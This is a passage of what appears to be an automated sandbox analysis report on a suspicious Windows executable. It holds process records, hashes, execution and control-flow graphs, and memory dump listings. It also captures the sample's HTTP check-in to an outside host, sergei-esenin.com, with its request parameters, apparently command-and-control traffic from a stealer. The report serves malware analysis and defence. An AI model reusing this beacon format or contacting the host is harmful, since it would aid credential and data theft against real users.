                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 52
                                                          Host: sergei-esenin.com
2024-10-14 04:52:08 UTC  52                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-14 04:52:08 UTC  825                IN         HTTP/1.1 200 OK
                                                          Date: Mon, 14 Oct 2024 04:52:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=plrk69d56u5nvg2otbvphu8gh1; expires=Thu, 06 Feb 2025 22:38:47 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwZIaEjHKPlFec4l4BcqFCQcjajuLjZTlXpUBF27Ujq%2Fi9Nh59T1BEwWj1YbgrMjksBi4EiZi5sBNdfUZl3DW58mVTM8GCp9FMtyIiYj%2Ft9j0uYzJKExrbIlTNfMuhXxo0o7Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d24f54f39f342e2-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-10-14 04:52:08 UTC | 15 bytes | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                          Data Ascii: aerror #D12
                                                          2024-10-14 04:52:08 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Target ID:0
                                                          Start time:00:52:02
                                                          Start date:14/10/2024
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                          Imagebase:0x530000
                                                          File size:2'963'456 bytes
                                                          MD5 hash:E6F6B8CEA53E7F4747E424F1617F3393
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:00:52:08
                                                          Start date:14/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924
                                                          Imagebase:0x9d0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:00:52:08
                                                          Start date:14/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1936
                                                          Imagebase:0x9d0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:2.8%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:34.6%
                                                            Total number of Nodes:208
                                                            Total number of Limit Nodes:15
                                                            execution_graph 7528 53d110 7532 53d119 7528->7532 7529 53d2ee 7530 53d2e9 7537 5756e0 7530->7537 7532->7529 7532->7530 7536 542f10 CoInitialize 7532->7536 7540 577180 7537->7540 7539 5756e5 FreeLibrary 7539->7529 7541 577189 7540->7541 7541->7539 7633 54d457 7634 5795b0 LdrInitializeThunk 7633->7634 7635 54d46b 7634->7635 7636 54d4a9 7635->7636 7639 54d4d6 7635->7639 7642 54d47a 7635->7642 7643 5798f0 7635->7643 7636->7639 7636->7642 7647 5799d0 7636->7647 7639->7642 7653 575bb0 LdrInitializeThunk 7639->7653 7641 54d6db 7645 579918 7643->7645 7644 57997e 7644->7636 7645->7644 7654 575bb0 LdrInitializeThunk 7645->7654 7649 5799f5 7647->7649 7648 579b0e 7648->7639 7650 579a5f 7649->7650 7655 575bb0 LdrInitializeThunk 7649->7655 7650->7648 7656 575bb0 LdrInitializeThunk 7650->7656 7653->7641 7654->7644 7655->7650 7656->7648 7817 546f91 7818 546fbc 7817->7818 7819 54702a 7818->7819 7823 575bb0 LdrInitializeThunk 7818->7823 7824 575bb0 LdrInitializeThunk 7819->7824 7822 5470d1 7823->7819 7824->7822 7554 5799d0 7556 5799f5 7554->7556 7555 579b0e 7557 579a5f 7556->7557 7560 575bb0 LdrInitializeThunk 7556->7560 7557->7555 7561 575bb0 LdrInitializeThunk 7557->7561 7560->7557 7561->7555 7825 540b93 7826 573220 RtlFreeHeap 7825->7826 7827 540b99 7826->7827 7692 54111d 7693 575700 2 API calls 7692->7693 7694 541127 7693->7694 7567 54049b 7571 540227 7567->7571 7568 540455 7570 575700 2 API calls 7568->7570 7572 540308 7570->7572 7571->7568 7571->7572 7573 575700 7571->7573 7574 575797 7573->7574 7575 57571b 7573->7575 7576 575729 7573->7576 7577 57578c 7573->7577 7579 573220 RtlFreeHeap 7574->7579 7575->7574 7575->7576 7575->7577 7578 575776 RtlReAllocateHeap 7576->7578 7577->7568 7578->7577 7579->7577 7695 54811b 7700 579b60 7695->7700 7697 54814a 7698 5481ea 7697->7698 7706 575bb0 LdrInitializeThunk 7697->7706 7702 579b85 7700->7702 7701 579c9e 7701->7697 7703 579bef 7702->7703 7707 575bb0 LdrInitializeThunk 
7702->7707 7703->7701 7708 575bb0 LdrInitializeThunk 7703->7708 7706->7697 7707->7703 7708->7701 7673 547c84 7674 547c89 7673->7674 7675 573220 RtlFreeHeap 7674->7675 7676 547c96 7675->7676 7731 574a40 7735 574a77 7731->7735 7732 574ad8 7734 574b6d 7732->7734 7740 573e30 7732->7740 7735->7732 7739 575bb0 LdrInitializeThunk 7735->7739 7738 574b29 7738->7734 7744 575bb0 LdrInitializeThunk 7738->7744 7739->7732 7742 573e45 7740->7742 7741 573ed0 7741->7738 7742->7741 7745 575bb0 LdrInitializeThunk 7742->7745 7744->7734 7745->7741 7746 548e0d 7747 548e42 7746->7747 7749 548ea4 7747->7749 7752 575bb0 LdrInitializeThunk 7747->7752 7751 548fa3 7749->7751 7753 575bb0 LdrInitializeThunk 7749->7753 7752->7747 7753->7749 7801 5483ce 7803 548403 7801->7803 7802 54846d 7803->7802 7805 575bb0 LdrInitializeThunk 7803->7805 7805->7803 7665 549809 7668 579410 7665->7668 7667 549848 7669 579430 7668->7669 7670 57954e 7669->7670 7672 575bb0 LdrInitializeThunk 7669->7672 7670->7667 7672->7670 7784 54e30b 7785 54e320 7784->7785 7788 54e34e 7784->7788 7786 573e30 LdrInitializeThunk 7785->7786 7786->7788 7787 54e560 7789 573220 RtlFreeHeap 7787->7789 7788->7787 7791 573e30 LdrInitializeThunk 7788->7791 7790 54e5a2 7789->7790 7794 54e41c 7791->7794 7792 573e30 LdrInitializeThunk 7792->7794 7793 573220 RtlFreeHeap 7793->7794 7794->7787 7794->7792 7794->7793 7795 54e56a 7794->7795 7796 573220 RtlFreeHeap 7795->7796 7796->7787 7709 546536 7712 54655c 7709->7712 7711 5468a4 7711->7711 7713 5732c0 7712->7713 7714 5732f0 7713->7714 7719 57333e 7714->7719 7721 575bb0 LdrInitializeThunk 7714->7721 7716 573220 RtlFreeHeap 7718 573492 7716->7718 7717 5733fe 7717->7716 7718->7711 7719->7717 7719->7718 7722 575bb0 LdrInitializeThunk 7719->7722 7721->7719 7722->7717 7542 53edb5 7543 53edd0 7542->7543 7543->7543 7546 53fca0 7543->7546 7548 53fcdc 7546->7548 7547 53ef70 7548->7547 7550 573220 7548->7550 7551 5732a2 RtlFreeHeap 7550->7551 7552 573236 7550->7552 7553 5732ac 7550->7553 7551->7553 
7552->7551 7553->7547 7562 5795b0 7564 5795d0 7562->7564 7563 57970e 7564->7563 7566 575bb0 LdrInitializeThunk 7564->7566 7566->7563 7723 54d93c 7724 5798f0 LdrInitializeThunk 7723->7724 7725 54d952 7724->7725 7797 544b3c 7799 544b40 7797->7799 7798 5542b0 LdrInitializeThunk 7800 545a97 7798->7800 7799->7798 7799->7800 7760 546ebf 7764 546a52 7760->7764 7762 573220 RtlFreeHeap 7762->7764 7764->7760 7764->7762 7765 573630 7764->7765 7769 575bb0 LdrInitializeThunk 7764->7769 7766 5736be 7765->7766 7767 573640 7765->7767 7766->7764 7767->7766 7770 575bb0 LdrInitializeThunk 7767->7770 7769->7764 7770->7766 7580 542fe0 7582 542ffa 7580->7582 7581 543377 7582->7580 7582->7581 7583 573220 RtlFreeHeap 7582->7583 7584 5434cc 7582->7584 7583->7582 7601 559510 7584->7601 7586 543674 7609 559bb0 7586->7609 7602 55956e 7601->7602 7602->7602 7613 579760 7602->7613 7604 5598f7 7606 559908 7604->7606 7617 556cc0 7604->7617 7606->7586 7607 559768 7607->7604 7607->7606 7608 579760 LdrInitializeThunk 7607->7608 7608->7604 7610 559c51 7609->7610 7626 5542b0 7610->7626 7612 559e05 7614 579780 7613->7614 7615 57989e 7614->7615 7620 575bb0 LdrInitializeThunk 7614->7620 7615->7607 7621 5795b0 7617->7621 7619 556d15 7620->7615 7623 5795d0 7621->7623 7622 57970e 7622->7619 7623->7622 7625 575bb0 LdrInitializeThunk 7623->7625 7625->7622 7627 5542c0 7626->7627 7628 579760 LdrInitializeThunk 7627->7628 7630 554319 7628->7630 7629 5543d7 7629->7612 7630->7629 7631 556cc0 LdrInitializeThunk 7630->7631 7631->7629 7771 54d760 7772 54d773 7771->7772 7773 5795b0 LdrInitializeThunk 7772->7773 7774 54d92d 7773->7774 7809 543be2 7810 543be9 7809->7810 7811 543ea3 7810->7811 7814 543e36 7810->7814 7815 575bb0 LdrInitializeThunk 7810->7815 7811->7814 7816 575bb0 LdrInitializeThunk 7811->7816 7815->7811 7816->7814 7726 573920 7727 57393c 7726->7727 7728 573a42 7727->7728 7730 575bb0 LdrInitializeThunk 7727->7730 7730->7728 7632 542f6f CoInitializeSecurity 7754 540228 7755 540455 7754->7755 7758 540242 
7754->7758 7759 540308 7754->7759 7757 575700 2 API calls 7755->7757 7756 575700 2 API calls 7756->7755 7757->7759 7758->7755 7758->7756 7758->7759 7677 5468ab 7678 5468aa 7677->7678 7678->7677 7680 5734d0 7678->7680 7681 57359e 7680->7681 7682 5734e1 7680->7682 7681->7678 7682->7681 7684 575bb0 LdrInitializeThunk 7682->7684 7684->7681

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 236 53fca0-53fcda 237 53fd0b-53fe22 236->237 238 53fcdc-53fcdf 236->238 240 53fe24 237->240 241 53fe5b-53fe8c 237->241 239 53fce0-53fd09 call 542690 238->239 239->237 245 53fe30-53fe59 call 542760 240->245 242 53feb6-53fec5 call 540b50 241->242 243 53fe8e-53fe8f 241->243 252 53feca-53fecf 242->252 246 53fe90-53feb4 call 542700 243->246 245->241 246->242 254 53fed5-53fef8 252->254 255 53ffe4-53ffe6 252->255 257 53ff2b-53ff2d 254->257 258 53fefa 254->258 256 5401b1-5401bb 255->256 260 53ff30-53ff3a 257->260 259 53ff00-53ff29 call 5427e0 258->259 259->257 261 53ff41-53ff49 260->261 262 53ff3c-53ff3f 260->262 264 5401a2-5401ad call 573220 261->264 265 53ff4f-53ff76 261->265 262->260 262->261 264->256 267 53ffab-53ffb5 265->267 268 53ff78 265->268 271 53ffb7-53ffbb 267->271 272 53ffeb 267->272 270 53ff80-53ffa9 call 542840 268->270 270->267 276 53ffc7-53ffcb 271->276 274 53ffed-53ffef 272->274 277 53fff5-54002c 274->277 278 54019a 274->278 276->278 280 53ffd1-53ffd8 276->280 281 54002e-54002f 277->281 282 54005b-540065 277->282 278->264 283 53ffda-53ffdc 280->283 284 53ffde 280->284 285 540030-540059 call 5428a0 281->285 286 5400a4 282->286 287 540067-54006f 282->287 283->284 288 53ffc0-53ffc5 284->288 289 53ffe0-53ffe2 284->289 285->282 290 5400a6-5400a8 286->290 292 540087-54008b 287->292 288->274 288->276 289->288 290->278 293 5400ae-5400c5 290->293 292->278 295 540091-540098 292->295 296 5400c7 293->296 297 5400fb-540102 293->297 298 54009e 295->298 299 54009a-54009c 295->299 300 5400d0-5400f9 call 542900 296->300 301 540104-54010d 297->301 302 540130-54013c 297->302 303 540080-540085 298->303 304 5400a0-5400a2 298->304 299->298 300->297 306 540117-54011b 301->306 307 5401c2-5401c7 302->307 303->290 303->292 304->303 306->278 309 54011d-540124 306->309 307->264 310 540126-540128 309->310 311 54012a 309->311 310->311 312 540110-540115 311->312 313 54012c-54012e 311->313 312->306 314 
540141-540143 312->314 313->312 314->278 315 540145-54015b 314->315 315->307 316 54015d-54015f 315->316 317 540163-540166 316->317 318 5401bc 317->318 319 540168-540188 call 542030 317->319 318->307 322 540192-540198 319->322 323 54018a-540190 319->323 322->307 323->317 323->322
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J|BJ$V$VY^_$eY.z8bZweqIPgKfpYDlsN4_L2R0LQF9aLZkPSL_aagI-1728881527-0.0.1.1-/api$t
                                                            • API String ID: 0-3830073232
                                                            • Opcode ID: 4ab2569b078e08f3bdac09cde3d3b1569e5867833a33ef7af0dcc19dc5a954af
                                                            • Instruction ID: 6f9484ef2169308b76d53bac4a5d0a0fab6b706266b8d33ec5ed4e69daacb92e
                                                            • Opcode Fuzzy Hash: 4ab2569b078e08f3bdac09cde3d3b1569e5867833a33ef7af0dcc19dc5a954af
                                                            • Instruction Fuzzy Hash: 9BD1767450C3909BD310DF14989466FBFE1BB96B48F68981CF9C99B252C336CD09DB92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 340 575700-575714 341 575797-5757a5 call 573220 340->341 342 5757b2 340->342 343 5757b0 340->343 344 57578c-575795 call 5731a0 340->344 345 57571b-575722 340->345 346 575729-57574a 340->346 341->343 347 5757b4-5757b9 342->347 343->342 344->347 345->341 345->342 345->343 345->346 348 575776-57578a RtlReAllocateHeap 346->348 349 57574c-57574f 346->349 348->347 352 575750-575774 call 575b30 349->352 352->348
                                                            APIs
                                                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00575784
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: bc0e20e0d9f188b5a9a7395f0c5fce4e9c8f5bb7e956714210a25e24355264e6
                                                            • Instruction ID: 8f4fd8257fa0a2fbd1d2dfe31f0c3702e369c3eb71c31e877b736ebef268d55e
                                                            • Opcode Fuzzy Hash: bc0e20e0d9f188b5a9a7395f0c5fce4e9c8f5bb7e956714210a25e24355264e6
                                                            • Instruction Fuzzy Hash: F711917591C240EBC305AF28F845A1BBFF5EF96710F058828E8C89B212E335D814EB93

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9dc15546d189289bb58969f0ce5e3a176f9824b37ccf2623a59bc87c9584c8a5
                                                            • Instruction ID: a0fcdfa73f450ab90f81265d3a4c2c3e303318fad885da6fd7cf600183867ec4
                                                            • Opcode Fuzzy Hash: 9dc15546d189289bb58969f0ce5e3a176f9824b37ccf2623a59bc87c9584c8a5
                                                            • Instruction Fuzzy Hash: 53919D75200B01CFD724CF25E894A26B7F6FF89314B118A6CE8568BBA1DB30E859DF50

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd806ca5b8fec160f5f9ec19a17a7935a282f2893abedefbbb2e5bca0d4fc32b
                                                            • Instruction ID: 8b845502372ba8830b8978098b720a5e00edfa08ef79ccc5846506add09c26a4
                                                            • Opcode Fuzzy Hash: dd806ca5b8fec160f5f9ec19a17a7935a282f2893abedefbbb2e5bca0d4fc32b
                                                            • Instruction Fuzzy Hash: 75718C74204701DFD724CF20E898A26BBF6FF89314F10896CE94A876A2D771A859EF50

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e8dc9199e988cb6cfff33b5f56ae7206554132d84444d3fdcbe78bc17107ac7
                                                            • Instruction ID: 6375be73efdd99c08c5ac993d8db5e1921ea66ac9e6de08fb12085b91c422138
                                                            • Opcode Fuzzy Hash: 6e8dc9199e988cb6cfff33b5f56ae7206554132d84444d3fdcbe78bc17107ac7
                                                            • Instruction Fuzzy Hash: F641217440D380ABD701AB68E588A2EFFF5BF92704F148C0CE5C49B252C33AD8249B67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb6ace61e993b0999be0f6fe06079a425d56f4101dbe4d93a3e27e02ca68f215
                                                            • Instruction ID: 3ca2c97171269f39c5cae2ebebf16d0d1bcd668efe5d20f75d6ffc2f5ecc7706
                                                            • Opcode Fuzzy Hash: bb6ace61e993b0999be0f6fe06079a425d56f4101dbe4d93a3e27e02ca68f215
                                                            • Instruction Fuzzy Hash: 66417C34209300ABD714DA15E890F2BFBB6FB85754F64C82CF98E97251E331E801EB62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                            • Instruction ID: 54e5b02297aabd80443934e65fcfe0197127b3422ab21597ee9ab29bf7d5d9d1
                                                            • Opcode Fuzzy Hash: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                            • Instruction Fuzzy Hash: AA21FC3250C3508BC7195E29AC9022EBFD2BBC5320F9AD93EE99E4B3C1D5359D40E391
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0c07d9d14a549618d8a08deb31ddba5743f911b6fbe493bcc38956501bc08a9
                                                            • Instruction ID: 30548c8e1c8c31005c6ca6ad84b1535dae42a4a42b6eeaf75fd641605634b62f
                                                            • Opcode Fuzzy Hash: c0c07d9d14a549618d8a08deb31ddba5743f911b6fbe493bcc38956501bc08a9
                                                            • Instruction Fuzzy Hash: 12213CB490022A9FDB15CF94DC90BBEBBB1FF46304F244818E911BB292C735A945CF64

                                                            Control-flow Graph

                                                            control_flow_graph 357 573220-57322f 358 573236-573252 357->358 359 5732a2-5732a6 RtlFreeHeap 357->359 360 5732a0 357->360 361 5732ac-5732b0 357->361 362 573286-573296 358->362 363 573254 358->363 359->361 360->359 362->360 364 573260-573284 call 575af0 363->364 364->362
                                                            APIs
